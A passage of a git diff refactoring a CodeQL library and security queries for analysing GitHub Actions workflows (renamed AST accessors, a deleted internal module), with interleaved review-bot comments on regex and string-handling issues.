c.(YamlSequence).getElementNode(_) = this + ) + } + + string getValue() { result = this.(YamlString).getValue() } +} + +/** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ +string getASimpleReferenceExpression(YamlString node) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + node.getValue() + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) + .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) +} + +/** + * A StringLiteral containing a workflow expression ${{}}. 
+ */ +class Expression extends StringLiteral { string expr; - Expression() { expr = Actions::getASimpleReferenceExpression(this) } + Expression() { expr = getASimpleReferenceExpression(this) } string getExpression() { result = expr } @@ -384,7 +513,7 @@ class Expression extends AstNode instanceof YamlString { } /** - * A ${{}} expression accessing a context variable. + * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ class ContextExpression extends Expression { @@ -549,7 +678,7 @@ class EnvExpression extends ContextExpression { override AstNode getTarget() { exists(AstNode s | - s.getEnvExpr(fieldName) = result and + s.getEnvVar(fieldName) = result and s.getAChildNode*() = this ) } @@ -572,12 +701,12 @@ class MatrixExpression extends ContextExpression { override AstNode getTarget() { exists(Workflow w | - w.getStrategy().getMatrixVariableExpr(fieldName) = result and + w.getStrategy().getMatrixVariable(fieldName) = result and w.getAChildNode*() = this ) or exists(Job j | - j.getStrategy().getMatrixVariableExpr(fieldName) = result and + j.getStrategy().getMatrixVariable(fieldName) = result and j.getAChildNode*() = this ) } diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll deleted file mode 100644 index fe10441fd67..00000000000 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ /dev/null 
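Review bot: The doc comment on `getASimpleReferenceExpression` does not match its pattern: the character class also admits `[`, `]`, `*`, `(` and `)`, so `${{ fromJSON(env.time) }}`, listed as not identified, is in fact matched. The find and capture patterns also differ, because the capture class contains a stray unescaped `(` in `\\((\\)`. That is harmless inside a character class but makes the two look different, so define the class once in a private predicate and reuse it in both calls. The comment should say "Gets" rather than "Holds if". It should also state the real limit: expressions containing spaces, quotes or operators are never returned, so `Expression` and the context classes built on it will not see them.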
@@ -1,398 +0,0 @@ -/** - * Libraries for modeling GitHub Actions workflow files written in YAML. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. - */ - -import codeql.actions.ast.internal.Yaml -import codeql.files.FileSystem - -/** - * Libraries for modeling GitHub Actions workflow files written in YAML. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. - */ -module Actions { - /** A YAML node in a GitHub Actions workflow or a custom composite action file. */ - private class Node extends YamlNode { - Node() { - exists(File f | - f = this.getLocation().getFile() and - ( - f.getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") or - f.getBaseName() = ["action.yml", "action.yaml"] - ) - ) - } - } - - /** - * A custom composite action. This is a mapping at the top level of an Actions YAML action file. - * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. - */ - class CompositeAction extends Node, YamlDocument, YamlMapping { - CompositeAction() { - this.getFile().getBaseName() = ["action.yml", "action.yaml"] and - this.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" - } - - /** Gets the `runs` mapping. */ - Runs getRuns() { result = this.lookup("runs") } - } - - /** - * An `runs` mapping in a custom composite action YAML. - * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs - */ - class Runs extends StepsContainer { - CompositeAction action; - - Runs() { action.lookup("runs") = this } - - /** Gets the action that this `runs` mapping is in. */ - CompositeAction getAction() { result = action } - - /** Gets the `using` mapping. */ - Using getUsing() { result = this.lookup("using") } - } - - /** - * The parent class of the class that can contain `steps` mappings. (`Job` or `Runs` currently.) 
- */ - abstract class StepsContainer extends YamlNode, YamlMapping { - /** Gets the sequence of `steps` within this YAML node. */ - YamlSequence getSteps() { result = this.lookup("steps") } - } - - /** - * A `using` mapping in a custom composite action YAML. - */ - class Using extends YamlNode, YamlScalar { - Runs runs; - - Using() { runs.lookup("using") = this } - - /** Gets the `runs` mapping that this `using` mapping is in. */ - Runs getRuns() { result = runs } - } - - /** - * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. - */ - class Workflow extends Node, YamlDocument, YamlMapping { - /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - YamlMapping getJobs() { result = this.lookup("jobs") } - - /** Gets the 'global' `env` mapping in this workflow. */ - WorkflowEnv getEnv() { result = this.lookup("env") } - - /** Gets the name of the workflow. */ - string getName() { result = this.lookup("name").(YamlString).getValue() } - - /** Gets the name of the workflow file. */ - string getFileName() { result = this.getFile().getBaseName() } - - /** Gets the `on:` in this workflow. */ - On getOn() { result = this.lookup("on") } - - /** Gets the job within this workflow with the given job ID. */ - Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } - } - - /** - * An Actions On trigger within a workflow. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#on. - */ - class On extends YamlNode, YamlMappingLikeNode { - Workflow workflow; - - On() { workflow.lookup("on") = this } - - /** Gets the workflow that this trigger is in. */ - Workflow getWorkflow() { result = workflow } - } - - /** A common class for `env` in workflow, job or step. */ - abstract class Env extends YamlNode, YamlMapping { } - - /** A workflow level `env` mapping. 
*/ - class WorkflowEnv extends Env { - Workflow workflow; - - WorkflowEnv() { workflow.lookup("env") = this } - - /** Gets the workflow this field belongs to. */ - Workflow getWorkflow() { result = workflow } - } - - /** A job level `env` mapping. */ - class JobEnv extends Env { - Job job; - - JobEnv() { job.lookup("env") = this } - - /** Gets the job this field belongs to. */ - Job getJob() { result = job } - } - - /** A step level `env` mapping. */ - class StepEnv extends Env { - Step step; - - StepEnv() { step.lookup("env") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - } - - /** - * An Actions job within a workflow. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. - */ - class Job extends StepsContainer { - string jobId; - Workflow workflow; - - Job() { this = workflow.getJobs().lookup(jobId) } - - /** - * Gets the ID of this job, as a string. - * This is the job's key within the `jobs` mapping. - */ - string getId() { result = jobId } - - /** - * Gets the ID of this job, as a YAML scalar node. - * This is the job's key within the `jobs` mapping. - */ - YamlString getIdNode() { workflow.getJobs().maps(result, this) } - - /** Gets the human-readable name of this job, if any, as a string. */ - string getName() { result = this.getNameNode().getValue() } - - /** Gets the human-readable name of this job, if any, as a YAML scalar node. */ - YamlString getNameNode() { result = this.lookup("name") } - - /** Gets the step at the given index within this job. */ - Step getStep(int index) { result.getJob() = this and result.getIndex() = index } - - /** Gets the `env` mapping in this job. */ - JobEnv getEnv() { result = this.lookup("env") } - - /** Gets the workflow this job belongs to. */ - Workflow getWorkflow() { result = workflow } - - /** Gets the value of the `if` field in this job, if any. 
*/ - JobIf getIf() { result.getJob() = this } - - /** Gets the value of the `runs-on` field in this job. */ - JobRunson getRunsOn() { result.getJob() = this } - } - - /** - * An `if` within a job. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idif. - */ - class JobIf extends YamlNode, YamlScalar { - Job job; - - JobIf() { job.lookup("if") = this } - - /** Gets the step this field belongs to. */ - Job getJob() { result = job } - } - - /** - * A `runs-on` within a job. - * See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idruns-on. - */ - class JobRunson extends YamlNode, YamlScalar { - Job job; - - JobRunson() { job.lookup("runs-on") = this } - - /** Gets the step this field belongs to. */ - Job getJob() { result = job } - } - - /** - * A step within an Actions job. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. - */ - class Step extends YamlNode, YamlMapping { - int index; - StepsContainer parent; - - Step() { this = parent.getSteps().getElement(index) } - - /** Gets the 0-based position of this step within the sequence of `steps`. */ - int getIndex() { result = index } - - /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ - Job getJob() { result = parent } - - /** Gets the `runs` this step belongs to, if the step belongs to a `runs` in a custom composite action. Has no result if the step belongs to a `job` in a workflow. */ - Runs getRuns() { result = parent } - - /** Gets the value of the `uses` field in this step, if any. */ - Uses getUses() { result.getStep() = this } - - /** Gets the value of the `run` field in this step, if any. */ - Run getRun() { result.getStep() = this } - - /** Gets the value of the `if` field in this step, if any. 
*/ - StepIf getIf() { result.getStep() = this } - - /** Gets the value of the `env` field in this step, if any. */ - StepEnv getEnv() { result = this.lookup("env") } - - /** Gets the ID of this step, if any. */ - string getId() { result = this.lookup("id").(YamlString).getValue() } - } - - /** - * An `if` within a step. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsif. - */ - class StepIf extends YamlNode, YamlScalar { - Step step; - - StepIf() { step.lookup("if") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - } - - /** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * The capture groups are: - * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` - * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. - * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. - */ - private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } - - /** - * A `uses` field within an Actions job step, which references an action as a reusable unit of code. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsuses. - * - * For example: - * ``` - * uses: actions/checkout@v2 - * ``` - * - * Does not handle local repository references, e.g. `.github/actions/action-name`. - */ - class Uses extends YamlNode, YamlScalar { - Step step; - - Uses() { step.lookup("uses") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - - /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. 
*/ - string getGitHubRepository() { - result = - ( - this.getValue().regexpCapture(usesParser(), 1) + "/" + - this.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() - } - - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - string getVersion() { result = this.getValue().regexpCapture(usesParser(), 3) } - } - - /** - * A `with` field within an Actions job step, which references an action as a reusable unit of code. - * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepswith. - * - * For example: - * ``` - * with: - * arg1: 1 - * arg2: abc - * ``` - */ - class With extends YamlNode, YamlMapping { - Step step; - - With() { step.lookup("with") = this } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } - } - - /** - * A `ref:` field within an Actions `with:` specific to `actions/checkout` action. - * - * For example: - * ``` - * uses: actions/checkout@v2 - * with: - * ref: ${{ github.event.pull_request.head.sha }} - * ``` - */ - class Ref extends YamlNode, YamlString { - With with; - - Ref() { with.lookup("ref") = this } - - /** Gets the `with` field this field belongs to. */ - With getWith() { result = with } - } - - /** - * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. - * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. 
- * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} - */ - string getASimpleReferenceExpression(YamlString node) { - // We use `regexpFind` to obtain *all* matches of `${{...}}`, - // not just the last (greedy match) or first (reluctant match). - result = - node.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) - .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) - } - - /** Extracts the 'name' part from env.name */ - bindingset[name] - string getEnvName(string name) { result = name.regexpCapture("env\\.([A-Za-z0-9_]+)", 1) } - - /** - * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. - */ - class Run extends YamlNode, YamlString { - Step step; - - Run() { step.lookup("run") = this } - - /** Gets the step that executes this `run` command. */ - Step getStep() { result = step } - } - - /** - * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds - */ - class Needs extends YamlNode { - Job job; - - Needs() { job.lookup("needs") = this } - - Job getJob() { result = job } - - Job getANeededJob() { - if this instanceof YamlString - then result.getId() = this.(YamlString).getValue() and result.getFile() = job.getFile() - else - if this instanceof YamlSequence - then - result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and - result.getFile() = job.getFile() - else none() - } - } -} diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 661544dfed2..d64c91f7bb7 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
+++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -77,7 +77,6 @@ module Completion { class ReturnSuccessor extends SuccessorType, TReturnSuccessor { override string toString() { result = "return" } } - // Why is there no conditional successor type? } module CfgScope { @@ -149,7 +148,7 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos rank[i](AstNode child, Location l | ( child = this.(CompositeAction).getAnInput() or - child = this.(CompositeAction).getAnOutputExpr() or + child = this.(CompositeAction).getAnOutput() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,10 +171,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { result = rank[i](AstNode child, Location l | ( - child = this.(ReusableWorkflow).getAJob() or child = this.(ReusableWorkflow).getAnInput() or - child = this.(ReusableWorkflow).getAnOutputExpr() or - child = this.(ReusableWorkflow).getStrategy() + child = this.(ReusableWorkflow).getAnOutput() or + child = this.(ReusableWorkflow).getStrategy() or + child = this.(ReusableWorkflow).getAJob() ) and l = child.getLocation() | @@ -203,7 +202,7 @@ private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getOutputExpr(_) and l = child.getLocation() + child = super.getOutput(_) and l = child.getLocation() | child order by @@ -216,7 +215,7 @@ private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getMatrixVariableExpr(_) and l = child.getLocation() + child = super.getMatrixVariable(_) and l = child.getLocation() | child order by 
@@ -248,7 +247,7 @@ private class UsesTree extends StandardPreOrderTree instanceof Uses { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and + (child = super.getArgument(_) or child = super.getEnvVar(_)) and l = child.getLocation() | child @@ -262,7 +261,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getEnvExpr(_) or child = super.getScriptExpr()) and + (child = super.getEnvVar(_) or child = super.getScript()) and l = child.getLocation() | child @@ -276,11 +275,4 @@ private class UsesLeaf extends LeafTree instanceof Uses { } private class InputTree extends LeafTree instanceof Input { } -// private class OutputExprTree extends LeafTree instanceof OutputExpr { } -// -// private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } -// -// private class EnvExprTree extends LeafTree instanceof EnvExpr { } -private class ExprAccessTree extends LeafTree instanceof ContextExpression { } - -private class AstNodeLeaf extends LeafTree instanceof Expression { } +private class StringLiteralLeaf extends LeafTree instanceof StringLiteral { } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 479078fe18b..c427f8b828a 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -52,7 +52,7 @@ predicate externallyDefinedSource( ) and ( if fieldName.trim().matches("env.%") - then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env.", "")) + then source.asExpr() = uses.getEnvVar(fieldName.trim().replaceAll("env.", "")) else if fieldName.trim().matches("output.%") then source.asExpr() = uses 
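Review bot: In the `externallyDefinedSource` hunk, `fieldName.trim().replaceAll("env.", "")` removes every occurrence of `env.` in the model field, not only the leading prefix that `matches("env.%")` has just tested. A key that contains that text a second time would be looked up under the wrong name, and the modelled source would silently fail to bind. Taking the remainder after the prefix avoids this, e.g. `uses.getEnvVar(fieldName.trim().regexpCapture("env\\.(.+)", 1))`. The same pattern appears with `env.` and `input.` in the `externallyDefinedStoreStep` and `externallyDefinedSink` hunks that follow. The enclosing predicate starts and ends outside this hunk.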
@@ -76,10 +76,10 @@ predicate externallyDefinedStoreStep( ) and ( if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) + then pred.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + then pred.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) else none() ) and succ.asExpr() = uses @@ -90,10 +90,10 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(Uses uses, string action, string version, string input | ( if input.trim().matches("env.%") - then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) + then sink.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + then sink.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) else none() ) and sinkModel(action, version, input, kind) and diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 64df342ae9b..0dea91af2b9 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -36,9 +36,9 @@ class AdditionalTaintStep extends Unit { predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and - r.getEnvExpr(varName) = pred.asExpr() and + r.getEnvVar(varName) = pred.asExpr() and exists(string script, string line | - script = r.getScript() and + script = r.getScript().getValue() and line = script.splitAt("\n") and ( output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or 
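Review bot: In `runEnvToScriptStoreStep`, the `(.*)` in `.*::set-output\\s+name=(.*)::.*` is greedy, so on a script line whose value itself contains `::` the captured output name runs up to the last `::`. The stored field name would then presumably not match the name used when the output is read, and the flow would be lost; `name=([^:]+)::` stops at the first separator. On the `c = any(...)` line, `replaceAll` takes a literal target, so `"output\\."` searches for a backslash and never strips anything; `"output."` or `regexpReplaceAll` is presumably what was intended. The predicate's remaining conditions, including the second alternative of the `or`, are outside this hunk.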
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index d99db775d61..57ef4743487 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -162,7 +162,7 @@ class ParameterPosition extends string { * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } + ArgumentPosition() { exists(any(Uses e).getArgument(this)) } } /** @@ -301,7 +301,7 @@ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { exists(Outputs out, string fieldName | - node1.asExpr() = out.getOutputExpr(fieldName) and + node1.asExpr() = out.getOutput(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) ) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index dbae273151b..3a21005e29b 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -78,12 +78,12 @@ class CallNode extends ExprNode { * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgument(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) + any(Uses e | e.getArgument(pos) = this.getCfgNode().getAstNode()) } } 
diff --git a/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml b/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml deleted file mode 100644 index df2fe6e3734..00000000000 --- a/ql/lib/ide-contextual-queries/ide-contextual-queries.testproj/codeql-database.yml +++ /dev/null @@ -1,39 +0,0 @@ ---- -sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib -baselineLinesOfCode: 0 -unicodeNewlines: false -columnKind: utf16 -primaryLanguage: yaml -inProgress: - primaryLanguage: yaml - installedExtractors: - go: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/go - python: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/python - java: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/java - html: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/html - xml: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/xml - properties: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/properties - cpp: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/cpp - swift: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/swift - csv: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csv - yaml: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/yaml - csharp: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/csharp - javascript: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/javascript - ruby: - - /Users/pwntester/.local/share/nvim/mason/packages/codeql/codeql/ruby -creationMetadata: - cliVersion: 2.16.0 - creationTime: 2024-02-02T10:02:02.082819Z -finalised: false diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 4b78f275382..ac829c2395e 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql 
+++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 0edeb0a7ec8..02e17b76ac5 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index 59a05f64b6c..7ca86560998 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 28ff074fd96..fd4350efae8 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql 
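Review bot: `ExpressionInjectionSink` is declared as a private class with the same characteristic predicate here and in ReusableWorkflowsSinks.ql, CriticalExpressionInjection.ql and ExpressionInjection.ql, so this commit has to repeat the identical `getScriptExpr()` to `getScript()` edit in each copy. Declaring the class once in a shared library module and importing it from the four queries would keep the sink definition from drifting between them. If the copies stay, a one-line QLDoc on each, such as `/** A Run step script, or a sink modelled as "expression-injection". */`, would state what the class is meant to cover.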
@@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 6e88f36fece..7b0f3159357 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 4f710a16e8f..699c5b2b5dc 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 63f1a7a9d3a..1f7797b8a0a 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql 
@@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index b13bf88abe6..0bf4e858db2 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScript() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 34bcbd7b060..58561ca6dba 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -21,7 +21,7 @@ private predicate isTrustedOrg(string repo) { exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) } -from StepUses uses, string repo, string version, Workflow workflow, string name +from UsesStep uses, string repo, string version, Workflow workflow, string name where uses.getCallee() = repo and uses.getEnclosingWorkflow() = workflow and diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index ed96d5f07c1..2e3dc7049bd 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
